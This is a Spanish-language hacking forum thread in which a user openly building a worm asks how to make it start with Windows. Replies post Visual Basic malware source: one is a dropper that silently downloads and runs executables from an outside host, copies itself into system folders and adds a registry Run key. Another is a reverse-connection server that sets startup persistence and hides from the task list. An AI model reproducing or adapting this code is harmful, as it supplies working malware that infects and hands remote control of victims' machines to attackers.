Como hacer que se autoejecute...

Iniciado por BorecK, 11 Diciembre 2006, 22:17 PM

0 Miembros y 1 Visitante están viendo este tema.

BorecK

Creo que hay post referidos a este tema pero no logro encontrar... tras una larga busqueda que creo que no fue muy buena... les quiero preguntar el codigo para que mi aplicacion se ejecute al iniciar windows.. ando intentando hacer un Worm... me puse a leer la guia de creacion de worms y no me sale completo el codigo... alguien podria decirme el codigo? no se si sea api o por medio de la shell si existen las dos les agradeceria que me ayudaran  :D....

Tyrz

hay otra forma pero es demasiado complicado para mi...
Yo suelo hacer que se copie en la carpeta de inicio y asi se arranca al encender la maquina.
Saludos
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf

CeLaYa

la unica manera que me se es insertando una entrada en el registro de windows

"HKEY_LOCAL_MACHINE\Software\microsoft\windows\currentversion\run"
"La soledad es el elemento de los grandes talentos".
Cristina de Suecia (1626-1689) Reina de Suecia.

CA

Es mil veces mejor crear un servicio y arranque el servicio al inicio con todos los demas.
Del gran mar he llegado a la tierra media y esta sera mi morada y la de mis descendientes hasta el fin del mundo.

BorecK

oh gracias pero no entendi mucho me podrian explicar mejor que codigo poner y como aderir al registro de windows ? es que se puede decir que soy novato jaja por eso quiero aprender de ustedes  :P

sp26

Que se autoejecute es algo demasiado imposible.. y de hecho, lo creo imposible.

Puedes crear una bomba logica o de cualquier archivo llame a otro archivo.

Yo cree un Worm que descarga un archivo de internet (De forma oculta) y que lo autoejecute. Los antivirus lo pasan por encima ya que no hace nada malo si no descargar un archivo :P.

Si quieres te paso el Codigo fuente para que lo analises. (Espera que lo suba).

BorecK

m encantaria ver tu codigo para aprender mas del funcionamiento de los malware, muchas gracias  ;D

sp26

#7
Aqui te dejo el codigo...



Option Explicit

            Dim RegistroCochino As Object
            Dim RutaCochina As String
            Dim CadenaNueva As String
            Dim ContenidoCadena As String
            Dim ERROR_SUCCESS

Private Declare Function URLDownloadToFile Lib "urlmon" _
   Alias "URLDownloadToFileA" _
  (ByVal pCaller As Long, _
   ByVal szURL As String, _
   ByVal szFileName As String, _
   ByVal dwReserved As Long, _
   ByVal lpfnCB As Long) As Long


Private Sub Form_Load()

Dim Ya_Existe As Integer
Ya_Existe = App.PrevInstance
If Ya_Existe <> 0 Then
End
End If

On Error GoTo fallo:

    Dim sSourceUrl As String

'Esta es la descarga oculta      <|>

    sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
    "Mis_Fotos/InetCat/InetCat.exe"

    DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\Files\InetCat.exe" ' Asegurate de poner la ruta a donde llega el archivo
   
   
    sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
        "Mis_Fotos/InetCat/Autoexec.bat"
       
        DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\System32\Repair\AUTOEXEC.BAT"  'Aqui tambien
       

Shell (Environ("SYSTEMROOT") & "\Files\InetCat.exe")
Shell Environ("SYSTEMROOT") & "\Files\InetCat.exe"
Shell Environ("Systemroot") & "\System32\Repair\Autoexec.bat"


FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\{323-432112-53252LGSD}\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\Shell\W\O\R\M\L\O\L\J\A\J\A\{03424-03259325JH-BSSGKDS}.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("Homepath") & "\AppData\" & "\WISIP.exe"

           
           
            ContenidoCadena = Environ("SYSTEMROOT") & "\Files\InetCat.exe"
            CadenaNueva = "\InetCat"
            RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
                        "\CurrentVersion\Run" & CadenaNueva
           
            Set RegistroCochino = CreateObject("WScript.Shell")
           
            RegistroCochino.RegWrite RutaCochina, ContenidoCadena




fallo:
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
  DownloadFile = URLDownloadToFile(0, sURL, _
    sLocalFile, 0, 0) = ERROR_SUCCESS

End Function



Acuerdate que esta es una estructura y es el cuerpo de la infeccio, no es el virus en cuestion pero te puede ayudar ;).

SOLOANDRAGORA

 ;D te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve ::)
es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado ::)
un saludo.


Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207"         'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000     'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path                                    'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"    'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe"                 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1"                     'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe"       'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control)
End Sub

sp26

Cita de: SOLOANDRAGORA en 16 Diciembre 2006, 07:27 AM
;D te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve ::)
es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado ::)
un saludo.


Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207"         'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000     'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path                                    'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"    'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe"                 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1"                     'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe"       'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control)
End Sub



Adherirse al registro o a la "Memoria"?